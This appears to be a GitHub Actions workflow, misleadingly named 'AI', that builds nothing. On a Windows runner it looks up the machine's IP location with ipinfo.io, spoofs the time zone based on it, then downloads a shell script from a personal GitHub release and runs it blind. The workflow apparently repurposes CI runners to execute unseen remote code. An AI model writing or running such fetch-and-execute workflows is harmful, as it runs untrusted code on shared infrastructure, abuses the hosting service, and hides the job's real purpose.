name: AI
on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 45

    steps:
    - name: IP1
      run: cmd /c curl ipinfo.io
  
    - name: TIME ZONE123 
      run: $timezone = (Invoke-RestMethod -Uri "https://ipinfo.io/json").timezone; switch ($timezone) { "America/Los_Angeles" { $timezone = "US Mountain Standard Time" } "America/New_York" { $timezone = "Paraguay Standard Time" } default { $timezone = "Paraguay Standard Time" } }; tzutil /s "$timezone"; Write-Output "Time zone changed to $timezone"
 
    - name: Download
      run: Invoke-WebRequest https://github.com/mohani9887/gitts/releases/download/2/2.sh -OutFile 2.sh

    - name: USER CODE
      run: cmd /c "C:\Program Files\Git\git-bash.exe" 2.sh
